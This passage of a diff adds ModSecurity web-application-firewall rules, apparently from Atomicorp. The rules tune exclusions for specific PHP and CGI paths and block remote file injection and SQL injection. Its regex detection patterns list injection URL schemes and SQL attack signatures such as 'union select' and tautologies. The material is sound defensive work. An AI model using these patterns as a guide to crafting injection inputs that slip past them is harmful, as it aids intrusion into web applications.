url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340491,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/private.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91070
+
+SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:91071,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91072,t:none,pass,nolog,skipAfter:END_RULES_91072"
+
+SecRule ARGS|!ARGS:weblink|!ARGS:weblink_title|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340492,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:weblink|!ARGS:weblink_title|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340493,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+# Rule 340444: Generic SQL sigs
+SecRule ARGS|!ARGS:message "(?:\b(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]]*update.+set.+=)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhitespace,t:lowercase,id:340444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
+
+SecMarker END_RULES_91072
+
+SecRule REQUEST_FILENAME "/admin/area/add-edit\.php" "phase:2,id:91073,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91074,t:none,pass,nolog,skipAfter:END_RULES_91074"
+
+SecRule ARGS|!ARGS:descripcion|!ARGS:description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340494,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:descripcion|!ARGS:description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340495,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/newreply.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91074
+
+SecRule REQUEST_FILENAME "/links\.php" "phase:2,id:91075,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91076,t:none,pass,nolog,skipAfter:END_RULES_91076"
+
+SecRule ARGS|!ARGS:S1|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:website|!ARGS:reciprocal|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340496,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/links.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:S1|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:website|!ARGS:reciprocal|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340497,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/links.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91076
+
+SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:91077,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340156"
+SecAction "phase:2,id:91078,t:none,pass,nolog,skipAfter:END_RULES_91078"
+
+#Always bad SQL injection case w/ antievasion
+SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:topicseen|!ARGS:message "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" "id:340498,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/forums/newreply.php)',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
+
+SecMarker END_RULES_91078
+
+SecRule REQUEST_FILENAME "/wysiwyg-edit" "phase:2,id:91079,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91080,t:none,pass,nolog,skipAfter:END_RULES_91080"
+
+SecRule ARGS|!ARGS:PageCopy|!ARGS:S1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340499,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wysiwyg-edit)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:PageCopy|!ARGS:S1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340500,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wysiwyg-edit)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91080
+
+SecRule REQUEST_FILENAME "/mt-comments\.cgi" "phase:2,id:91081,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91082,t:none,pass,nolog,skipAfter:END_RULES_91082"
+
+SecRule ARGS|!ARGS:static|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340503,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt4/mt-comments.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:static|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340504,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt4/mt-comments.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91082
+
+SecRule REQUEST_FILENAME "/ajax/check_mandatory_fields\.php" "phase:2,id:91083,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/admin/dogen_display\.php" "phase:2,id:91084,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340021,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340193,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91085,t:none,pass,nolog,skipAfter:END_RULES_91085"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/referrer/|!ARGS:headerfile|!ARGS:footerfile|!ARGS:insertfile|!ARGS:/file$/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340505,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/dogen_display.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/referrer/|!ARGS:headerfile|!ARGS:footerfile|!ARGS:insertfile|!ARGS:/file$/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340506,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/dogen_display.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91085
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:91086,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/clients\.php" "phase:2,id:91087,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91088,t:none,pass,nolog,skipAfter:END_RULES_91088"
+
+SecRule ARGS|!ARGS:emailBody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340509,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modernbill5/app-modernbill-admin/clients.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:emailBody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340510,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modernbill5/app-modernbill-admin/clients.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91088
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/dbpro\.cgi" "phase:2,id:91089,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91090,t:none,pass,nolog,skipAfter:END_RULES_91090"
+
+SecRule ARGS|!ARGS:admin_email_text "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340511,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/database/dbpro.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:admin_email_text "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340512,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/database/dbpro.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91090
+
+SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:91091,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340157"
+SecAction "phase:2,id:91092,t:none,pass,nolog,skipAfter:END_RULES_91092"
+
+SecRule ARGS|!ARGS:patch_query "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]]*update.+set.+=)" "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,id:340515,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/admin/patch.php)'"
+SecRule REQUEST_URI|ARGS|!ARGS:patch_query "(?:(\w+)and(\w+)char\([0-9]+\)|(?:execute|convert)\(|(?:\;delete.*;(?:insert|declare|varchar)|(?:and .* \(select |(?:drop|create)(\w+)table|declare .* varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |union all select )" "phase:2,deny,status:403,log,auditlog,id:344516,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (/admin/patch.php)',deny,log,auditlog,status:403,phase:2"
+
+SecMarker END_RULES_91092
+
+SecRule REQUEST_FILENAME "/images/logdnet\.php" "phase:2,id:91093,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91094,t:none,pass,nolog,skipAfter:END_RULES_91094"
+
+SecRule ARGS|!ARGS:a|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340517,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/images/logdnet.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:a|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340518,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/images/logdnet.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91094
+
+SecRule REQUEST_FILENAME "/contact_form\.php" "phase:2,id:91095,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91096,t:none,pass,nolog,skipAfter:END_RULES_91096"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:Comments|!ARGS:/^Explain_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340519,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact_form.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:Comments|!ARGS:/^Explain_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340520,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact_form.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91096
+
+SecRule REQUEST_FILENAME "/forum/register\.php" "phase:2,id:91097,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91098,t:none,pass,nolog,skipAfter:END_RULES_91098"
+
+SecRule ARGS|!ARGS:s|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/userfield/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340521,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/register.ph)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:s|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/userfield/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340522,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/register.ph)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91098
+
